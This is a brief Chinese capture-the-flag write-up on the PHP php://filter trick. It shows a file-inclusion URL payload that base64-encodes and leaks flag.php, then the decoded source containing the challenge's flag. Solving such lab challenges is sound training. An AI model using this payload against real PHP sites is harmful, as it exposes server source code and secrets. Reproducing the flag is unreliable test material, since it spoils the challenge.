php伪代码
在web链接后面添加
?file=php://filter/read=convert.base64-encode/resource=flag.php
得到一串字符
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YTEwMTU3MTYtNDdmZS00M2VmLTg5MjItYzBjZmU4Yzc4MTE3fQo=
(发现这是Base64的密码密文)
用解码器编码一下就得到
<?php
echo "Can you find out the flag?";
//flag{a1015716-47fe-43ef-8922-c0cfe8c78117}
哦了